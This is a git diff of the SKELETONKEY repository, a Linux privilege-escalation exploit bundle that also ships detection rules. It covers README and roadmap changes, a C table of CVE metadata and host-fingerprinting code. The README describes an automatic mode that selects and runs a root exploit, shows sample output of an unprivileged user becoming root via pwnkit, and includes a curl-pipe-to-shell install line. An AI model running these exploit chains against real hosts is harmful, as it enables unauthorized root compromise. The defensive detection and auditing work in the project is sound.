+copy_fail family ×5 · dirty_pipe · dirty_cow · pwnkit · overlayfs
+(CVE-2021-3493) · overlayfs_setuid (CVE-2023-0386) ·
+cgroup_release_agent · ptrace_traceme · sudoedit_editor · entrybleed
+(KASLR leak primitive)
+
+**🟡 Modules with opt-in `--full-chain`:**
+af_packet · af_packet2 · af_unix_gc · cls_route4 · fuse_legacy ·
+nf_tables · nft_set_uaf · nft_fwd_dup · nft_payload ·
+netfilter_xtcompat · stackrot · sudo_samedit · sequoia · vmwgfx
+
+### Empirical verification (22 of 26 CVEs)
+
+Records in [`docs/VERIFICATIONS.jsonl`](docs/VERIFICATIONS.jsonl) prove
+each verdict against a known-target VM. Coverage:
+
+| Distro / kernel | Modules verified |
+|---|---|
+| Ubuntu 18.04 (4.15.0) | af_packet · ptrace_traceme · sudo_samedit |
+| Ubuntu 20.04 (5.4 stock + 5.15 HWE) | af_packet2 · cls_route4 · nft_payload · overlayfs · pwnkit · sequoia |
+| Ubuntu 22.04 (5.15 stock + mainline 5.15.5 / 6.1.10) | af_unix_gc · dirty_pipe · entrybleed · nf_tables · nft_set_uaf · overlayfs_setuid · stackrot · sudoedit_editor |
+| Debian 11 (5.10 stock) | cgroup_release_agent · fuse_legacy · netfilter_xtcompat · nft_fwd_dup |
+| Debian 12 (6.1 stock) | pack2theroot |
+
+**Not yet verified (4):** `vmwgfx` (VMware-guest-only — no public
+Vagrant box), `dirty_cow` (needs ≤ 4.4 kernel — older than every
+supported box), `dirtydecrypt` & `fragnesia` (need Linux 7.0 — not
+shipping as any distro kernel yet). All four are flagged in
+[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml) with
+rationale.
+
+See [`CVES.md`](CVES.md) for per-module CVE, kernel range, and
+detection status. Run `skeletonkey --module-info <name>` for the
+embedded verification records per module.

 ## Quickstart

 ```bash
-# One-shot install (x86_64 / arm64; checksum-verified)
+# Install (x86_64 / arm64; checksum-verified)
 curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh
-```

-**skeletonkey runs as a normal unprivileged user** — that's the whole
-point. `--scan`, `--audit`, `--exploit`, and `--detect-rules` all
-work without `sudo`. Only `--mitigate` and rule-file installation
-write to root-owned paths.
-
-```bash
 # What's this box vulnerable to?  (no sudo)
 skeletonkey --scan

-# Broader system hygiene (setuid binaries, world-writable, capabilities, sudo)
-skeletonkey --audit
+# One-page operator briefing for a single CVE: CWE / MITRE ATT&CK /
+# CISA KEV status, live detect() trace, OPSEC footprint, detection
+# coverage. Useful for triage tickets and SOC analyst handoffs.
+skeletonkey --explain nf_tables

-# Deploy detection rules (needs sudo to write /etc/audit/rules.d/)
-skeletonkey --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules
+# Pick the safest LPE and run it
+skeletonkey --auto --i-know

-# Apply temporary mitigations (needs sudo for modprobe.d + sysctl)
-sudo skeletonkey --mitigate copy_fail
+# Deploy detection rules (needs sudo to write into /etc/audit/rules.d/)
+skeletonkey --detect-rules --format=auditd \
+  | sudo tee /etc/audit/rules.d/99-skeletonkey.rules

-# Fleet scan (any-sized host list via SSH; aggregated JSON for SIEM)
-./tools/skeletonkey-fleet-scan.sh --binary skeletonkey --ssh-key ~/.ssh/id_rsa hosts.txt
+# Fleet scan — many hosts via SSH, aggregated JSON for SIEM
+./tools/skeletonkey-fleet-scan.sh --binary skeletonkey \
+  --ssh-key ~/.ssh/id_rsa hosts.txt
 ```

+**SKELETONKEY runs as a normal unprivileged user** — that's the point.
+`--scan`, `--audit`, `--exploit`, and `--detect-rules` all work without
+`sudo`. Only `--mitigate` and rule-file installation write root-owned
+paths.
+
 ### Example: unprivileged → root

 ```text
 $ id
 uid=1000(kara) gid=1000(kara) groups=1000(kara)

-$ skeletonkey --scan
-[+] dirty_pipe       VULNERABLE (kernel 5.15.0-56-generic)
-[+] cgroup_release_agent VULNERABLE (kernel 5.15 < 5.17)
-[+] pwnkit           VULNERABLE (polkit 0.105-31ubuntu0.1)
-[-] copy_fail        not vulnerable (kernel 5.15 < introduction)
-[-] dirty_cow        not vulnerable (kernel ≥ 4.9)
+$ skeletonkey --auto --i-know
+[*] auto: host=demo distro=ubuntu/24.04 kernel=5.15.0-56-generic arch=x86_64
+[*] auto: active probes enabled — brief /tmp file touches and fork-isolated namespace probes
+[*] auto: scanning 31 modules for vulnerabilities...
+[+] auto: dirty_pipe             VULNERABLE (safety rank 90)
+[+] auto: cgroup_release_agent   VULNERABLE (safety rank 98)
+[+] auto: pwnkit                 VULNERABLE (safety rank 100)
+[ ] auto: copy_fail              patched or not applicable
+[ ] auto: nf_tables              precondition not met
+...

-$ skeletonkey --exploit dirty_pipe --i-know
-[!] dirty_pipe: kernel 5.15.0-56-generic IS vulnerable
-[+] dirty_pipe: writing UID=0 into /etc/passwd page cache...
-[+] dirty_pipe: spawning su root
+[*] auto: scan summary — 3 vulnerable, 21 patched/n.a., 7 precondition-fail, 0 indeterminate
+[*] auto: 3 vulnerable modules found. Safest is 'pwnkit' (rank 100).
+[*] auto: launching --exploit pwnkit...
+
+[+] pwnkit: writing gconv-modules cache + payload.so...
+[+] pwnkit: execve(pkexec) with NULL argv + crafted envp...
 # id
 uid=0(root) gid=0(root) groups=0(root)
 ```

-`skeletonkey --help` lists every command. See [`CVES.md`](CVES.md) for
-the curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md)
-for the blue-team deployment guide.
+The safety ranking goes: **structural escapes** (no kernel state
+touched) → **page-cache writes** → **userspace cred-races** →
+**kernel primitives** → **kernel races** (least predictable). The
+goal is to never crash a production box looking for root.

-## What this is
+## How it works

-Most Linux LPE references are dead repos, broken PoCs, or single-CVE
-deep-dives. **SKELETONKEY is a living corpus**: each CVE that lands here
-is empirically verified to work on the kernels it claims to target,
-CI-tested across a distro matrix, and ships with the detection
-signatures defenders need to spot it in their environment.
+Each CVE (or tightly-related family) is a **module** under `modules/`.
+Modules export a standard interface (`detect / exploit / mitigate /
+cleanup`) plus metadata (kernel range, detection rule text). The
+top-level binary dispatches per command:

-The same binary covers offense and defense:
+- `--scan` walks every module's `detect()` against the running host
+- `--exploit <name> --i-know` runs the named module's exploit (the
+  `--i-know` flag is the authorization gate)
+- `--auto --i-know` does the scan, ranks by safety, runs the safest
+- `--detect-rules --format=<auditd|sigma|yara|falco>` emits the
+  embedded rule corpus
+- `--mitigate <name>` / `--cleanup <name>` apply / undo temporary
+  mitigations (module-dependent — most kernel modules say "upgrade")
+- `--dump-offsets` reads `/proc/kallsyms` + `/boot/System.map` and
+  emits a ready-to-paste C entry for the `--full-chain` offset table

- `skeletonkey --scan` — fingerprint the host, report which bundled CVEs
-  apply, and which are blocked by patches/config/LSM
- `skeletonkey --exploit <CVE>` — run the named exploit (with `--i-know`
-  authorization gate)
- `skeletonkey --detect-rules` — dump auditd / sigma / yara rules for
-  every bundled CVE so blue teams can drop them into their tooling
- `skeletonkey --mitigate` — apply temporary mitigations for CVEs the
-  host is vulnerable to (sysctl knobs, module blacklists, etc.)
+See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the
+module-loader design.
+
+## The verified-vs-claimed bar
+
+Most public PoC repos hardcode offsets for one kernel build and
+silently break elsewhere. SKELETONKEY refuses to ship fabricated
+offsets. The shared `--full-chain` finisher only returns
+`EXPLOIT_OK` after a setuid bash sentinel file *actually appears*;
+otherwise modules return `EXPLOIT_FAIL` with a diagnostic. Operators
+populate the offset table once per target kernel via
+`skeletonkey --dump-offsets` and either set env vars or upstream the
+entry via PR ([`CONTRIBUTING.md`](CONTRIBUTING.md)).
+
+## Build from source
+
+```bash
+git clone https://github.com/KaraZajac/SKELETONKEY.git
+cd SKELETONKEY
+make
+./skeletonkey --version
+```
+
+Builds clean with gcc or clang on any modern Linux. macOS dev builds
+also compile (modules with Linux-only headers stub out gracefully).

 ## Status

-**Active — v0.3.0 cut 2026-05-16.** Corpus covers **24 modules**
-across the 2016 → 2026 LPE timeline:
+**v0.6.0 cut 2026-05-23.** 31 modules across 26 CVEs, **22 empirically
+verified** against real Linux VMs (Ubuntu 18.04 / 20.04 / 22.04 +
+Debian 11 / 12 + mainline kernels 5.15.5 / 6.1.10 from
+kernel.ubuntu.com). 88-test unit harness on every push.

- 🟢 **13 modules land root** end-to-end on a vulnerable host
-  (copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
-  overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
-  cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
- 🟡 **11 modules fire the kernel primitive** by default and refuse
-  to claim root without empirical confirmation. Pass `--full-chain`
-  to engage the shared `modprobe_path` finisher and attempt root
-  pop — requires kernel offsets via env vars / `/proc/kallsyms` /
-  `/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
-  Modules: af_packet, af_packet2, af_unix_gc, cls_route4,
-  fuse_legacy, nf_tables, netfilter_xtcompat, nft_fwd_dup,
-  nft_payload, nft_set_uaf, stackrot.
- Detection rules ship inline (auditd / sigma / yara / falco) and
-  are exported via `skeletonkey --detect-rules --format=…`.
+Reliability + accuracy work in v0.6.0:
+- Shared **host fingerprint** (`core/host.{h,c}`) populated once at
+  startup — kernel/distro/userns gates/sudo+polkit versions — exposed
+  to every module via `ctx->host`.
+- **Test harness** (`tests/`, `make test`) — 88 tests: 33 kernel_range
+  unit tests + 55 detect() integration tests over mocked host
+  fingerprints. Runs in CI on every push.
+- **VM verifier** (`tools/verify-vm/`) — Vagrant + Parallels scaffold
+  that boots known-vulnerable kernels (stock distro + mainline via
+  kernel.ubuntu.com), runs `--explain --active` per module, records
+  match/MISMATCH/PRECOND_FAIL as JSON. 22 modules confirmed end-to-end.
+- **`--explain <module>`** — single-page operator briefing: CVE / CWE
+  / MITRE ATT&CK / CISA KEV status, host fingerprint, live detect()
+  trace, OPSEC footprint, detection-rule coverage, verified-on
+  records. Paste-into-ticket ready.
+- **CVE metadata pipeline** (`tools/refresh-cve-metadata.py`) — fetches
+  CISA KEV catalog + NVD CWE; 10 of 26 modules cover KEV-listed CVEs.
+- **119 detection rules** across auditd / sigma / yara / falco; one
+  command exports the corpus to your SIEM.
+- `--auto` upgrades: per-detect 15s timeout, fork-isolated detect +
+  exploit, structured verdict table, scan summary, `--dry-run`.

-See [`CVES.md`](CVES.md) for the per-CVE inventory + patch status.
-See [`ROADMAP.md`](ROADMAP.md) for the next planned modules.
+Not yet verified (4 of 26 CVEs): `vmwgfx` (VMware-guest only),
+`dirty_cow` (needs ≤ 4.4 kernel), `dirtydecrypt` + `fragnesia` (need
+Linux 7.0 — not shipping yet). Rationale in
+[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml).

-## Why this exists
+See [`ROADMAP.md`](ROADMAP.md) for the next planned modules and
+infrastructure work.

-The Linux kernel privilege-escalation space is fragmented:
+## Contributing

- **`linux-exploit-suggester` / `linpeas`**: suggest applicable
-  exploits, don't run them
- **`auto-root-exploit` / `kernelpop`**: bundle exploits, but largely
-  stale, no CI, no defensive signatures
- **Per-CVE single-PoC repos**: usually one author, often abandoned
-  within months of release, often only one distro
+PRs welcome for: kernel offsets (run `--dump-offsets` on a target
+kernel, paste into `core/offsets.c`), new modules, detection rules,
+and CVE-status corrections. See [`CONTRIBUTING.md`](CONTRIBUTING.md).

-SKELETONKEY's bet is that there's room for a single curated bundle that
-(1) actively maintains a small set of high-quality exploits across a
-multi-distro matrix, and (2) ships detection rules alongside each
-exploit so the same project serves both red and blue teams.
-
-## Architecture
-
-Each CVE (or tightly-related family) is a **module** under `modules/`.
-Modules export a standard interface: `detect()`, `exploit()`,
-`mitigate()`, `cleanup()`, plus metadata describing affected kernel
-ranges, distro coverage, and CI test matrix.
-
-Shared infrastructure (AppArmor bypass, su-exploitation primitives,
-fingerprinting, common utilities) lives in `core/`.
-
-See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the
-module-loader design and how to add a new CVE.
-
-## Build & run
+**Keeping `kernel_range` tables current.** `tools/refresh-kernel-ranges.py`
+polls Debian's security tracker and reports drift between each
+module's hardcoded `kernel_patched_from` thresholds and the
+fixed-versions Debian actually ships. Run periodically (or in CI)
+to catch new backports that need to land in the corpus:

 ```bash
-make                          # build all modules
-./skeletonkey --scan              # what's this box vulnerable to?  (no sudo)
-./skeletonkey --scan --json       # machine-readable output for CI/SOC pipelines
-./skeletonkey --detect-rules --format=sigma > rules.yml
-./skeletonkey --exploit copy_fail --i-know   # actually run an exploit (starts as $USER)
+tools/refresh-kernel-ranges.py            # human report
+tools/refresh-kernel-ranges.py --json     # machine-readable
+tools/refresh-kernel-ranges.py --patch    # proposed C-source edits
 ```

 ## Acknowledgments

 Each module credits the original CVE reporter and PoC author in its
-`NOTICE.md`. SKELETONKEY is the bundling and bookkeeping layer; the
-research credit belongs to the people who found the bugs.
+`NOTICE.md`. SKELETONKEY is the bundling and bookkeeping layer;
+the research credit belongs to the people who found the bugs.

 ## License

@@ -164,16 +164,94 @@ Backfill of historical and recent LPEs as time allows.
      (hand-rolled nfnetlink, NFT_GOTO+DROP malformed verdict,
      msg_msg kmalloc-cg-96 groom, no pipapo R/W chain).

+**Landed since v0.1.0 (in the 28-module verified corpus):**
+
+- [x] **CVE-2021-3156** — sudo Baron Samedit: 🟡 PRIMITIVE
+      (`sudoedit -s` heap overflow; heap-tuned, may crash sudo).
+- [x] **CVE-2021-33909** — Sequoia: 🟡 PRIMITIVE (`seq_file` size_t
+      overflow → kernel stack OOB; trigger + witness, no cred chain).
+- [x] **CVE-2023-22809** — sudoedit EDITOR/VISUAL argv escape: 🟢 FULL
+      structural argv-injection (no kernel state, no offsets).
+- [x] **CVE-2023-2008** — vmwgfx DRM bo size-validation OOB: 🟡
+      PRIMITIVE (kmalloc-512 OOB + slab witness, no cred chain).
+
+**Landed (ported from public PoC, pending VM verification — NOT part
+of the 28-module verified corpus):**
+
+- [x] **CVE-2026-46300** — Fragnesia: 🟡 XFRM ESP-in-TCP page-cache
+      write. Ported from the V12 PoC; the old `_stubs/fragnesia_TBD`
+      stub is retired. The stub's open question ("is the
+      unprivileged-userns-netns scenario in scope?") is resolved —
+      the module ships and reports `PRECOND_FAIL` when the userns gate
+      is closed.
+- [x] **CVE-2026-31635** — DirtyDecrypt: 🟡 rxgk missing-COW in-place
+      decrypt page-cache write. Ported from the V12 PoC.
+- [x] **CVE-2026-41651** — Pack2TheRoot: 🟡 PackageKit `InstallFiles`
+      TOCTOU. Ported from the public Vozec PoC; original disclosure by
+      Deutsche Telekom security. Userspace D-Bus LPE with high-
+      confidence `detect()` — reads PackageKit's version directly over
+      D-Bus and compares against the pinned fix release 1.3.5 (commit
+      `76cfb675`). Debian-family only (PoC's built-in `.deb` builder).
+      Adds an optional GLib/GIO build dependency, autodetected via
+      `pkg-config gio-2.0`; stub-compiles if absent.
+- [ ] **Verify all three (dirtydecrypt / fragnesia / pack2theroot)
+      on a vulnerable target**, pin remaining CVE fix commits, add
+      version-range tables, and promote 🟡 → 🟢. `--auto` auto-enables
+      `--active` so the probes give definitive verdicts; each
+      `detect()` runs in a fork-isolated child so one bad probe
+      cannot tear down the scan.
+
+**--auto accuracy work (landed 2026-05-22):**
+
+- [x] `--auto` auto-enables `--active`: per-module sentinel probes
+      run in `/tmp` / fork-isolated namespaces, so version-only
+      checks can no longer be fooled by silent distro backports.
+- [x] Per-module verdict table at scan time (VULNERABLE / patched /
+      precondition / indeterminate) instead of only printing the
+      `VULNERABLE` rows.
+- [x] Scan-end summary line counting each verdict class.
+- [x] Distro fingerprint (`ID` + `VERSION_ID` from `/etc/os-release`)
+      printed in the `--auto` banner alongside kernel + arch.
+- [x] Fork-isolated `detect()` calls — a SIGILL/SIGSEGV in any one
+      module's probe is contained and the scan continues. Surfaced
+      while testing entrybleed's `prefetchnta` sweep under emulated
+      CPUs: exactly the failure mode the isolation now handles.
+- [x] `--dry-run` flag: previews the picked exploit (or single-module
+      operation) without firing. Works with `--auto`, `--exploit`,
+      `--mitigate`, `--cleanup`. `--auto --dry-run` does NOT require
+      `--i-know` (nothing fires) so operators can inspect the host's
+      attack surface without arming. Bare `--auto` still gates on
+      `--i-know` and now points to `--dry-run` in the refusal message.
+- [x] Version-pinned `detect()` for the 3 ported modules — Debian
+      tracker provided the fix commits: `dirtydecrypt` against mainline
+      `a2567217` (Linux 7.0); `fragnesia` against 7.0.9; `pack2theroot`
+      against PackageKit 1.3.5. The `kernel_range` model now drives
+      their verdicts; `--active` confirms empirically on top.
+- [x] **`core/host` host-fingerprint refactor.** A single
+      `struct skeletonkey_host` is populated once at startup and
+      handed to every module via `ctx->host`: kernel version + arch
+      + distro id/version + capability gates (unprivileged_userns,
+      AppArmor restriction, BPF disabled, KPTI, lockdown, SELinux,
+      Yama ptrace) + service presence (systemd, system D-Bus). The
+      `--auto` / `--scan` banner now prints the fingerprint up front
+      so operators see at a glance which gates are open. 4 modules
+      migrated to consume the fingerprint (dirtydecrypt, fragnesia,
+      pack2theroot, overlayfs) — replacing per-detect `uname`s,
+      `/etc/os-release` parses, and userns fork-probes with O(1)
+      cached lookups. See `docs/ARCHITECTURE.md` for the pattern;
+      future modules can opt-in by including `core/host.h`.
+- [ ] Migrate the remaining modules (cgroup_release_agent /
+      overlayfs_setuid / copy_fail_family bridge / others) to
+      consume `ctx->host` — incremental follow-up.
+
 **Carry-overs:**

- [ ] **CVE-2023-2008** — vmwgfx OOB write
- [ ] Fragnesia (if it lands as a CVE)
 - [ ] Anything we ourselves disclose — bundled AFTER upstream patch
      ships (responsible-disclosure-first)

 ## Phase 8 — Full-chain promotions (post v0.1.0)

-The 7 🟡 PRIMITIVE modules each stop one or two steps short of full
+The 14 🟡 PRIMITIVE modules each stop one or two steps short of full
 cred-overwrite. Promotion to 🟢 means landing the leak → R/W →
 modprobe_path-or-cred-rewrite stage on at least one tracked kernel.
 None requires fresh research — each has a public reference exploit;
@@ -184,9 +262,15 @@ auto-resolve via System.map / kallsyms when accessible).

 Priority order: nf_tables (Notselwyn pipapo R/W), netfilter_xtcompat
 (Andy Nguyen modprobe_path), af_packet (xairy sk_buff cred chase).
-The other four are lower priority — fuse_legacy and cls_route4 have
+The remainder are lower priority — fuse_legacy and cls_route4 have
 narrower distro reach; af_packet2 piggybacks on af_packet; stackrot's
-race window makes it inherently low-yield.
+race window makes it inherently low-yield; the nft_* family and
+vmwgfx need their per-kernel offset tables built out.
+
+The 2 ported-but-unverified modules (`dirtydecrypt`, `fragnesia`) are
+**not** part of this Phase 8 promotion set — they need VM verification
+and pinned fix commits first (tracked under Phase 7+ above) before any
+full-chain work is meaningful.

 ## Non-goals

@@ -0,0 +1,236 @@
+/*
+ * SKELETONKEY — CVE metadata table
+ *
+ * AUTO-GENERATED by tools/refresh-cve-metadata.py from
+ * docs/CVE_METADATA.json. Do not hand-edit; rerun the script.
+ * Sources: CISA KEV catalog + NVD CVE API 2.0.
+ */
+
+#include "cve_metadata.h"
+
+#include <stddef.h>
+#include <string.h>
+
+const struct cve_metadata cve_metadata_table[] = {
+    {
+        .cve                 = "CVE-2016-5195",
+        .cwe                 = "CWE-362",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-03-03",
+    },
+    {
+        .cve                 = "CVE-2017-7308",
+        .cwe                 = "CWE-681",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2019-13272",
+        .cwe                 = NULL,
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2021-12-10",
+    },
+    {
+        .cve                 = "CVE-2020-14386",
+        .cwe                 = "CWE-250",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2021-22555",
+        .cwe                 = "CWE-787",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2025-10-06",
+    },
+    {
+        .cve                 = "CVE-2021-3156",
+        .cwe                 = "CWE-193",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-04-06",
+    },
+    {
+        .cve                 = "CVE-2021-33909",
+        .cwe                 = "CWE-190",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2021-3493",
+        .cwe                 = "CWE-270",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-10-20",
+    },
+    {
+        .cve                 = "CVE-2021-4034",
+        .cwe                 = "CWE-787",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-06-27",
+    },
+    {
+        .cve                 = "CVE-2022-0185",
+        .cwe                 = "CWE-190",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2024-08-21",
+    },
+    {
+        .cve                 = "CVE-2022-0492",
+        .cwe                 = "CWE-287",
+        .attack_technique    = "T1611",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2022-0847",
+        .cwe                 = "CWE-665",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-04-25",
+    },
+    {
+        .cve                 = "CVE-2022-25636",
+        .cwe                 = "CWE-269",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2022-2588",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-0179",
+        .cwe                 = "CWE-190",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-0386",
+        .cwe                 = "CWE-282",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2025-06-17",
+    },
+    {
+        .cve                 = "CVE-2023-0458",
+        .cwe                 = "CWE-476",
+        .attack_technique    = "T1082",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-2008",
+        .cwe                 = "CWE-129",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-22809",
+        .cwe                 = "CWE-269",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-32233",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-3269",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-4622",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2024-1086",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2024-05-30",
+    },
+    {
+        .cve                 = "CVE-2026-31635",
+        .cwe                 = "CWE-130",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2026-41651",
+        .cwe                 = "CWE-367",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2026-46300",
+        .cwe                 = NULL,
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+};
+
+const size_t cve_metadata_table_len =
+    sizeof(cve_metadata_table) / sizeof(cve_metadata_table[0]);
+
+const struct cve_metadata *cve_metadata_lookup(const char *cve)
+{
+    if (!cve) return NULL;
+    for (size_t i = 0; i < cve_metadata_table_len; i++) {
+        if (strcmp(cve_metadata_table[i].cve, cve) == 0)
+            return &cve_metadata_table[i];
+    }
+    return NULL;
+}
@@ -0,0 +1,43 @@
+/*
+ * SKELETONKEY — CVE metadata lookup
+ *
+ * Per-CVE annotations sourced from authoritative federal databases:
+ *   - CISA Known Exploited Vulnerabilities catalog (in_kev, date_added)
+ *   - NVD CVE API (cwe)
+ *   - Hand-curated MITRE ATT&CK technique mapping
+ *
+ * Kept separate from struct skeletonkey_module because these are
+ * properties of the CVE (one CVE -> one set of values), not the
+ * exploit module. Two modules covering the same CVE see the same
+ * metadata. The OPSEC notes — which vary by exploit technique —
+ * stay on the module struct.
+ *
+ * The table is auto-generated from docs/CVE_METADATA.json by
+ * tools/refresh-cve-metadata.py. Do not hand-edit cve_metadata.c —
+ * re-run the refresh tool.
+ */
+
+#ifndef SKELETONKEY_CVE_METADATA_H
+#define SKELETONKEY_CVE_METADATA_H
+
+#include <stdbool.h>
+#include <stddef.h>
+
+struct cve_metadata {
+    const char *cve;                  /* "CVE-YYYY-NNNNN" */
+    const char *cwe;                  /* "CWE-NNN" or NULL if NVD has no mapping */
+    const char *attack_technique;     /* "T1068" etc. */
+    const char *attack_subtechnique;  /* "T1068.001" or NULL */
+    bool        in_kev;               /* true iff in CISA's KEV catalog */
+    const char *kev_date_added;       /* "YYYY-MM-DD" or "" */
+};
+
+/* The full table. Length is `cve_metadata_table_len`. */
+extern const struct cve_metadata cve_metadata_table[];
+extern const size_t              cve_metadata_table_len;
+
+/* Lookup by CVE id (e.g. "CVE-2024-1086"). Returns NULL if the CVE
+ * isn't in the table. Cheap linear scan; we have <100 entries. */
+const struct cve_metadata *cve_metadata_lookup(const char *cve);
+
+#endif /* SKELETONKEY_CVE_METADATA_H */
@@ -0,0 +1,355 @@
+/*
+ * SKELETONKEY — host fingerprint implementation
+ *
+ * Lives behind a one-shot lazy-init: skeletonkey_host_get() probes on
+ * first call, stores into a file-static, and returns the same pointer
+ * forever after. Single-threaded (skeletonkey is single-threaded), so
+ * no synchronisation needed.
+ */
+
+#include "host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/utsname.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <pwd.h>
+
+#ifdef __linux__
+#include <sched.h>
+#include <sys/wait.h>
+#endif
+
+static struct skeletonkey_host g_host;
+static bool g_host_ready = false;
+
+/* ── small parser helpers ─────────────────────────────────────────── */
+
+/* Copy the value of a `KEY=VAL` line (stripping leading quotes and
+ * trailing quote / newline) into `dst`. Caller passes the start of the
+ * value (after `=`). Cap is the size of dst including NUL. */
+static void parse_os_release_value(const char *s, char *dst, size_t cap)
+{
+	const char *p = s;
+	if (*p == '"' || *p == '\'') p++;
+	size_t L = strcspn(p, "\"'\n");
+	if (L >= cap) L = cap - 1;
+	memcpy(dst, p, L);
+	dst[L] = '\0';
+}
+
+static bool path_exists(const char *p)
+{
+	struct stat st;
+	return stat(p, &st) == 0;
+}
+
+#ifdef __linux__
+/* Sysctl/sys-fs readers — Linux-only consumers (populate_caps). */
+static bool read_int_file(const char *path, int *out)
+{
+	FILE *f = fopen(path, "r");
+	if (!f) return false;
+	int v;
+	int n = fscanf(f, "%d", &v);
+	fclose(f);
+	if (n != 1) return false;
+	*out = v;
+	return true;
+}
+
+static bool read_first_line(const char *path, char *dst, size_t cap)
+{
+	FILE *f = fopen(path, "r");
+	if (!f) return false;
+	if (!fgets(dst, (int)cap, f)) { fclose(f); return false; }
+	fclose(f);
+	size_t n = strlen(dst);
+	while (n > 0 && (dst[n-1] == '\n' || dst[n-1] == '\r')) dst[--n] = '\0';
+	return true;
+}
+#endif
+
+/* ── populators ───────────────────────────────────────────────────── */
+
+static void populate_kernel(struct skeletonkey_host *h)
+{
+	struct utsname u;
+	if (uname(&u) == 0) {
+		/* utsname.machine/nodename can be up to 65 bytes on glibc; the
+		 * %.*s precision spec tells gcc the snprintf is bounded so it
+		 * does not warn about possible truncation (we WANT truncation;
+		 * the snprintf already caps). */
+		snprintf(h->arch,     sizeof h->arch,
+			 "%.*s", (int)sizeof(h->arch) - 1, u.machine);
+		snprintf(h->nodename, sizeof h->nodename,
+			 "%.*s", (int)sizeof(h->nodename) - 1, u.nodename);
+	}
+	/* kernel_version_current owns the static release-string buffer
+	 * and the parser — reuse it to keep one source of truth. */
+	kernel_version_current(&h->kernel);
+}
+
+static void populate_distro(struct skeletonkey_host *h)
+{
+	snprintf(h->distro_id,         sizeof h->distro_id,         "?");
+	snprintf(h->distro_version_id, sizeof h->distro_version_id, "?");
+	snprintf(h->distro_pretty,     sizeof h->distro_pretty,     "?");
+
+	FILE *f = fopen("/etc/os-release", "r");
+	if (!f) return;
+	char line[256];
+	while (fgets(line, sizeof line, f)) {
+		if (strncmp(line, "ID=", 3) == 0)
+			parse_os_release_value(line + 3,
+				h->distro_id, sizeof h->distro_id);
